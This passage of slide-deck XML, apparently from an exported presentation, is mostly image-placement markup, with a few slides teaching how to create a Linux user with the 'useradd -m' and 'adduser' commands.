          <a:xfrm>
            <a:off x="1304975" y="0"/>
            <a:ext cx="6689890" cy="5143500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/slides/slide6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5" name="Shape 3915"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3916" name="Google Shape;3916;p633"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="1432" l="17372" r="18664" t="11231"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1156975" y="0"/>
            <a:ext cx="6696658" cy="5143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85"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="172425" y="3215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How to create a linux user?</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="4020">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="462" name="Google Shape;462;p85"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1270200" y="1074838"/>
            <a:ext cx="7251000" cy="29523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b="1" lang="en" sz="4600">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>useradd</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="4600">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="4600">
                <a:solidFill>
                  <a:srgbClr val="DC143C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>-m</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="4600">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t> &lt;userName&gt;</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="4600">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="457200" lvl="0" marL="2286000" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="105000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="4600">
                <a:solidFill>
                  <a:srgbClr val="8B008B"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Or</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="4600">
              <a:solidFill>
                <a:srgbClr val="8B008B"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="105000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="4600">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>adduser &lt;userName&gt;</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="4600">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="463" name="Google Shape;463;p85"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1265625" y="4207775"/>
            <a:ext cx="72510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3700">
                <a:solidFill>
                  <a:srgbClr val="DC143C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>-m = create home directory</a:t>
            </a:r>
            <a:endParaRPr sz="500">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/slides/slide6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0" name="Shape 3920"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3921" name="Google Shape;3921;p634"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="6421" l="17264" r="18554" t="8305"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1092275" y="0"/>
            <a:ext cx="6882067" cy="5143500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/slides/slide6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pic>
        <p:nvPicPr>
          <p:cNvPr id="3926" name="Google Shape;3926;p635"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="5068" l="18231" r="19629" t="8739"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1276050" y="0"/>
            <a:ext cx="6591902" cy="5143500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/slides/slide6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0" name="Shape 3930"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3931" name="Google Shape;3931;p636"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="4104" l="18232" r="19306" t="9127"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1147725" y="0"/>
            <a:ext cx="6582331" cy="5143500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/slides/slide6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5" name="Shape 3935"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3936" name="Google Shape;3936;p637"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="6587" l="18236" r="19840" t="9701"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1046000" y="0"/>
            <a:ext cx="6764074" cy="5143500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/slides/slide6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0" name="Shape 3940"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3941" name="Google Shape;3941;p638"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="2007" l="18232" r="19520" t="12944"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1281312" y="0"/>
            <a:ext cx="6692328" cy="5143500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/slides/slide6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5" name="Shape 3945"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3946" name="Google Shape;3946;p639"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="1241" l="17484" r="19304" t="13134"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1323425" y="0"/>
            <a:ext cx="6750869" cy="5143500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/slides/slide6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0" name="Shape 3950"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3951" name="Google Shape;3951;p640"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="3344" l="18669" r="19837" t="14283"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1235775" y="85275"/>
            <a:ext cx="6712954" cy="5058226"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/slides/slide6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5" name="Shape 3955"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3956" name="Google Shape;3956;p641"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="7550" l="18231" r="19629" t="8549"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1267950" y="0"/>
            <a:ext cx="6772056" cy="5143500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/slides/slide6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0" name="Shape 3960"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3961" name="Google Shape;3961;p642"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="4867" l="18232" r="19306" t="9888"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1277200" y="0"/>
            <a:ext cx="6700430" cy="5143500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/slides/slide6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5" name="Shape 3965"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3966" name="Google Shape;3966;p643"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="4490" l="18664" r="19736" t="11419"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1434400" y="0"/>
            <a:ext cx="6698242" cy="51435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6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="431250" y="624125"/>
            <a:ext cx="8281500" cy="32310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5000">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>We must create user with home directory</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="5000">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/slides/slide6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0" name="Shape 3970"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3971" name="Google Shape;3971;p644"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="19206" l="11033" r="37042" t="22505"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="824075" y="262200"/>
            <a:ext cx="7065125" cy="4461426"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/slides/slide6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5" name="Shape 3975"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3976" name="Google Shape;3976;p645"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="2576" l="18341" r="19734" t="12374"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1434425" y="0"/>
            <a:ext cx="6657643" cy="5143500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/slides/slide6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0" name="Shape 3980"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3981" name="Google Shape;3981;p646"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="2774" l="17910" r="19200" t="12371"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1088150" y="0"/>
            <a:ext cx="6776928" cy="5143500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/slides/slide6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5" name="Shape 3985"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3986" name="Google Shape;3986;p647"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="1431" l="17053" r="19195" t="13331"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1129225" y="0"/>
            <a:ext cx="6838781" cy="5143500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/slides/slide6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0" name="Shape 3990"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3991" name="Google Shape;3991;p648"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="4685" l="17268" r="19731" t="9507"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1101475" y="0"/>
            <a:ext cx="6712910" cy="5143500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/slides/slide6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5" name="Shape 3995"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3996" name="Google Shape;3996;p649"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="4492" l="17372" r="18664" t="11226"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1102175" y="0"/>
            <a:ext cx="6939643" cy="5143500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/slides/slide6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0" name="Shape 4000"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4001" name="Google Shape;4001;p650"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="3725" l="18666" r="19090" t="11421"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1267950" y="0"/>
            <a:ext cx="6707371" cy="5143500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/slides/slide6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5" name="Shape 4005"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4006" name="Google Shape;4006;p651"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="2390" l="17805" r="19412" t="11602"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1351150" y="0"/>
            <a:ext cx="6675154" cy="5143500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/slides/slide6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0" name="Shape 4010"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4011" name="Google Shape;4011;p652"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="1619" l="17696" r="18876" t="13136"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1323450" y="0"/>
            <a:ext cx="6804149" cy="5143500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/slides/slide6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5" name="Shape 4015"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4016" name="Google Shape;4016;p653"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="4486" l="18455" r="19196" t="9889"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1242487" y="0"/>
            <a:ext cx="6659026" cy="5143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7"/>
          <p:cNvSpPr txBox="1"/>
